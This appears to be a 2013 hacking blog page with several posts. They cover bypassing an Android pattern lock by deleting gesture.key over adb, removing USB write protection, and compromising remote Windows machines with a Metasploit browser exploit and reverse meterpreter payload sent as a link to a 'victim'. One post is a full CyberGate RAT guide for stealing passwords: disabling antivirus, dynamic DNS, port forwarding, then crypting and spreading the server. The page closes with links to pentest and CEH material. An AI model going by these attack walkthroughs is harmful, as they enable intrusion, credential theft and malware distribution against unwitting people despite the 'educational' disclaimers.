Saturday, December 21, 2013


CRACK Pattern Lock

Hello friends.....,

I am here with a new cool hack....,

i m here to show you how to hack android pattern



Yup!! the android pattern lock can be hacked!!!

Follow the procedure...

 Thing you need:- 
 {Note:- USB debugging must be on } 


Android Debug Bridge (adb) is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. It is a client-server program that includes three components:

  • A client, which runs on your development machine. You can invoke a client from a shell by issuing an adb command. Other Android tools such as the ADT plugin and DDMS also create adb clients.
  • A server, which runs as a background process on your development machine. The server manages communication between the client and the adb daemon running on an emulator or device.
  • A daemon, which runs as a background process on each emulator or device instance.

1) Download ADB tools from the given link.
2) Extract it. ( passwoed is - HackersLife )
3) Now open cmd.exe from the given tools,
4) Type adb.exe {enter}
5) Now type the following command-
          adb shel {enter}
          rm /data/system/gesture.key {enter}
          reboot {enter}




How to Unlock an Andriod Pattern

Today many android phone user use the inbuilt unlock pattern for give security to there phones this is very easy to use but some time to take many wrong attempts it locked permanently after that you need to enter the user id you enter in the google play store to unlock phone but there is some problems to unlock again if u stop data usage in your so it can’t be connected with internet and then you cannot unlock phone without this trick. sometime user needs to go to Samsung care center and then give some money to unlock it again so this is costly you need to pay here i gona give you a trick How To Unlock an Android Pattern  Just follow these simple steps to unlock your phone and use again free of cost.

  1.  phone want you to enter the user email id you enter in the play store.
  2.  you don’t know the email id.
  3. Then just don’t worry just follow these steps.
  4. just switch off you android phone and then wait for second to switched of it.

  1. then first click Up VolumeKey and hold it.
  2. then click on home button and hold it.
  3. then press the power button and after is started just release it.
  4. and then you can see you enter in the secret android menu you never see it before.
  5. just click on home button for up and down in the menu.
  6. then just go to third option named as DELETE ALL USER DATA.
  7. then it takes dome time.
  8. the phone will be started and the unlock patter problem is fixed

How to format a write-protected USB flash drive or memory card

Remove write-protection from your drive

Some memory cards and USB pen drives have write protection switches, which allows you to prevent files from being deleted, or any new files being written to the device. It also prevents the drive or card from being formatted.

Occasionally, you’ll find that a USB flash drive will refuse to format and Windows will tell you that it is write protected, even though there is no switch.
Here are a couple of methods you can try to format the drive and remove the write protection. Bear in mind that there is no guarantee that they will work for you: your drive or memory card may be corrupt or broken and no utility or low-level formatting tool will make it work again. The only solution in this case is to buy a new drive.

Removing write-protection in the Registry using Regedit.exe

In any version of Windows from XP onwards, run Regedit.exe (searching regedit will usually show the program at the top of the list).
Navigate to the following key:

Regedit StorageDevicePolicies

Double-click on the WriteProtect value in the right-hand pane of Regedit.exe. Change the Value data from 1 to 0 and click OK to save the change. Close Regedit and restart your computer. Connect your USB drive again, and you should find it is no longer write protected. You can now format the drive as normal by right-clicking on it in My Computer and choosing Format.
If you can’t find StorageDevicePolicies, you can try creating a key by right-clicking in the white space in the Control folder and choosing New -> Key and carefully entering the name.

Regedit new key

Now double-click on the new key (folder) and right-click once again and choose New -> DWORD. Name it WriteProtect and set its value to 0. Click OK, exit Regedit and reboot your computer.
If this method doesn’t work, try the following:

Removing write-protection using Diskpart

With your USB drive plugged in, launch a command prompt. Do this by searching for cmd.exe in the Start menu (or Start screen in Windows 8). In Windows XP, click Start then Run, and type cmd.exe in the box.
NOTE: you may need to run Cmd.exe with administrator privileges if you see an “access is denied” message.
To do that, right-click on the shortcut and choose Run as administrator. In Windows 8, simply choose Command prompt (admin).
Now, type the following, pressing Enter after each command:
list disk
select disk x (where x is the number of your USB flash drive – use the capacity to work out which one it is)
attributes disk clear readonly
create partition primary
format fs=fat32  (you can swap fat32 for ntfs if you only need to use the drive with Windows computers)


Sunday, October 13, 2013

Hacking A Remote Windows Using Metasploit - MegaPost.

Hello Friends , I am back with a blasting post on hacking windows.So, I will give you a little introduction about this post. 
In this post i am gonna hack or control a remote windows 7, xp using metasploit.
So let we start hacking.

Follow all steps according to this post ======>

1. Open metasploit in windows or in backtrack.

2. After opening this just type this code :-

use exploit/windows/browser/ms11_050_mshtml_cobjectelement.
3. Now type set payload windows/meterpreter/reverse_tcp

4. Now type set  lhost  in place of type your ip address.

5. Now type set srvhost  in place of type your ip address.

6. Now type set uripath hackerslifebygaurav

7. Now type exploit.

9. Now a server will be created on ur ip and send the link 
send this link to your victim.

Now when your victim open ur link he will be hacked and then type 
sessions -l to start exploiting the victim.

Note : For only Education

Saturday, October 12, 2013

CyberGate RAT - Hacking Facebook, Twitter and Email Id's Passwords

What is CyberGate:


CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. So, its much exciting, therefore i thought to give a tutorial about it, since it can also be used for constructive purpose i-e you can view the clients of you office or your homies, that what are they doing at computer. Rather they are sincere or not. I am going to show you step by step guide, by creating my own server.

Steps For creating a successful cybergate server:-

Step 1) I have hosted to cybergate for dowloading to the two locations, as often i get messages that download link is not working.

Download CyberGate:

First Download Location of Cyber Gate
Second Downalod Location of Cyber Gate

Step 2) Now, It will be better that you temporarily disable your antivirus software. and also other security software if its the case that CyberGate isn't working for you.

Step 3) Set up your account at , If you are already registered that just login. After loging in add a host.

Step 4) You have to add host, Like this, after getting logged in!

  After that, fill like this, Replace hackerslife with your desired name!

Thats it you are done, with following info:

Host name: your host name ( anyname you want )

Host Type: DNS Host (A) , Further leave other fields blank like i did.

Host process is now finished now i am moving to no-ip client.

Step 5) Download no-ip client from here. Download according to your OS, It supports windows, mac or linux. After downloading install the program, And then run it, You will promted to put in your email id along with password which you used to login to the, After loging in, Do what i did in the following screen shot!

Note: Always keep this software opened, Whenever cyper gate is running.
 Thats it, We have done with, Now procees forward with cybergate!

Step 6) Extract The Cybergate archive You Downloaded In The Beginning To Your Desktop! Once Extracted, Open It & Wait 20 Seconds For The Agreement To Pass! When It's Open, Press: Control Center -> Start.
and then press, Control Center -> Options -> Select Listening Ports, After this a popup will appear fill that like this:

cybergate server making
Explaining further:

1) At first, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear   Under "Active Ports"

2) Active Ports: The Port You Will Forward Later using modem or uTorrent!
3) Connections Limit: The Max Amount Of Victims You Can Have.

4) Connection PW: The Connection Password. Use "123456"
[V] Show Password: (Shows Password)
Once This Is Done, Press "Save"!

Step 7) After this we are going to create the server, Go to, Control Centre -> Build -> Create Server

After adding name, select the name i-e hacked and Press forward.Now, Following windows will appear, Fill it like this:
 Now, Click ok, It will be added in the list, After that select and click delete. So, that following form will come in front of you:
  Note: If You Want To Try The Server On Yourself, Then Delete Both:

And Replace Them With; Since Means "Local Computer & LAN Internet"
Step 8) After this move on to the installer tab, and do what i did in the following screen shot:

Well, i think for this section no further explanation is required, things themselves in the screen shot are telling that what they are meant to do.

Step 9) Now move on to the Anti-Debug tab, and follow guideline as shown in the screen shot:

Step 10) Move on to the final tab, that is Create Server. and do what i did!

So, You are done!

Step 11) (There are many ways for this step, You can also google for some other better way) Now you have to port forward, For this purpose, login to your router or modem (Recommended way) and forward the port which you have used while making the cber gate i-e 100, But another quick tweak is this that simply run uTorrent and select Options > Preferences > Connection than enter there in Listening Ports, the value of port you want to be forwarded (e-g 100) than select Apply.After that Exit the uTorrent from the tray of the windows. and go to and check whether port is access-able or not. If its access-able, You will get this message for port 100:
Success: I can see your service on on port (100)
Your ISP is not blocking port 100

What to do if RAT is not Connecting?

Make Sure That....

1) You are properly port-forwarded if using a router.
2) You have the No-IP Client installed and running.
3) Your DNS entries are correctly spelled when building your server.
4) The password in Listening Ports and the password your server uses are identical.
5) You are Listening on the correct ports.
6) Your Firewall is letting connections through on the port you're listening on.
7) Your server is added to excluded files in your Antivirus and Firewall.

Once You've Port Forwarded Your Port: "100" Then Just Get It Crypted And Start Spreading. After that you will surely get some victims But i will surely point out here that don't use this for bad purpose!
Note: All this was for educating my readers, HackersLife is not responsible for company or individual harm caused by it. Also don't use it to hack innocents, As this isn't attitude of hackers.

Sunday, March 3, 2013

Download Live Hacking

Live Hacking DVD and Live Hacking CD are Linux live distribution focused on penetration testing and ethical hacking. With no installation required, the analysis platform is started directly from the CD/DVD-Rom and is fully accessible within minutes to conduct live hacking and penetration tests.
Live Hacking distribution comes in two forms. A full Linux desktop (Live Hacking DVD) including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quick find and launch the tools.
The second variation is the Live Hacking Mini CD, which is command line only. However this doesn’t detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included.
The system requirements for the Live Hacking DVD and CD are quite reasonable. A fast Pentium 3 or any Pentium 4 class processor (or greater) is sufficient. For the desktop version 512MB of memory is required with 1GB recommended. For the command line version just 128MB of memory is needed.
Please accept the terms of use below to gain access to the ISO images:
I acknowledge that the provided tools and techniques are to educate, introduce and demonstrate various ethical hacking techniques. I should not use these techniques and tools for any illegal or malicious activities, and I should not use any of the described techniques and tools in an attempt to compromise any computer system.
I acknowledge that the contents of the provided media are provided “as is”. No warranties of any kind, either express or implied, including, but not limited to, the implied warranties of solutions and instructions for a particular purpose, are made in relation to the accuracy, reliability or contents of the mentioned tools in this media.
I acknowledge, the provided tools are not authored by Dr. Ali Jahangiri and in many cases are submitted by the companies or security communities. While every reasonable effort is made to ensure that these programs do what is claimed, Dr. Ali Jahangiri will not be held accountable for any damage or distress caused by the proper or improper usage of these materials, and makes no guarantee in regards to their operation or suitability for any specific purpose.
Live Hacking DVD, Version 1.3TDC Beta May 17, 2011, ISO-MD5 Hash: 78876a830dc9bc779cd4b2fed10c61a1

Live Hacking DVD, Version 1.3 Beta April 20, 2011, ISO-MD5 Hash: 053fdfda98d1e3c9cebd2cd15249d9eb

Live Hacking DVD, Version 1.2 Beta August 25, 2010, ISO-MD5 Hash: ded9ce8ee66c7d7e23f535d38a10e91f

Live Hacking CD, Version 1.1 Full April 27, 2010, ISO-MD5 Hash: dd1d96aec7821e6b623c93a1c9569658

Live Hacking Mini CD, Version 1.0 Beta, April 27, ISO-MD5 Hash: dd19a497421f37c508d681586e132c99

Friday, February 8, 2013

CEH:Certified Ethcial Hacker [Materials] Download Free

Free Download : CEH [ Certified Ethcial Hacker Materials]
Ethical Hacking ~ Lab's - 70 Topics  Covering  almost that Things you need ~  254.7 MB

                               !! CERTIFIED ETHCIAL HACKER !!

1: Student Introduction
2: Introduction to Ethical Hacking
3: Hacking Laws
4: Footprinting
5: Google Hacking
6: Scanning
7: Enumeration
8: System Hacking
9: Trojans and Backdoors
10: Viruses and Worms
11: Sniffers
12: Social Engineering
13: Phishing
14: Hacking Email Accounts
15: Denial of Service
16: Session Hijacking
17: Hacking Webservers
18: Web Application Vulnerabilities
19: Web based Password Cracking Techniques
20: SQL Injection
21: Hacking Wireless Networks
22: Physical Security
23: Linux Hacking
24: Evading IDS Firewall and Honeypot
25: Buffer Overflows
26: Cryptography
27: Penetration Testing
28: Writing Virus Codes
29: Assembly Language Tutorial
30: Exploit Writing 1 
31: Exploit Writing 2 
32: Exploit Writing 3 
33: Reverse Engineering Techniques
34: MAC OS X Hacking
35: Hacking Routers, Cable Modems and Firewalls
36: Hacking Mobile Phones, PDA and Handheld Devices
37: Bluetooth Hacking
38: VoIP Hacking
39: RFID Hacking
40: Spamming
41: Hacking USB Devices
42: Hacking Database Servers
43: Cyber Warfare- Hacking Al-Qaida and Terrorism
44: Internet Content Filtering Techniques
45: Privacy on the Internet
46: Securing Laptop Computers
47: Spying Technologies
48: Corporate Espionage by Insiders
49: Creating Security Policies
50: Software Piracy and W
51: Hacking and Cheating Online Games
52: Hacking RSS and Atom
53: Hacking Web Browsers
54: Proxy Server Technologies
55: Preventing Data Loss
56: Hacking Global Positioning System
57: Computer Forensics and Incident Handling
58: Credit Card Frauds
59: How to Steal Passwords
60: Firewall Technologies
61: Threats and Countermeasures
62: Case Studies
63: Botnets
64: Economic Espionage
65: Patch Management
67: Security Convergence
68: Identifying the Terrorists
69: prova 312-50
70: CEH - Classroom Lab Setup v6
Download Link: 

- 2: Certified Ethical Hacker_Vol_2.rar - 100.3 MB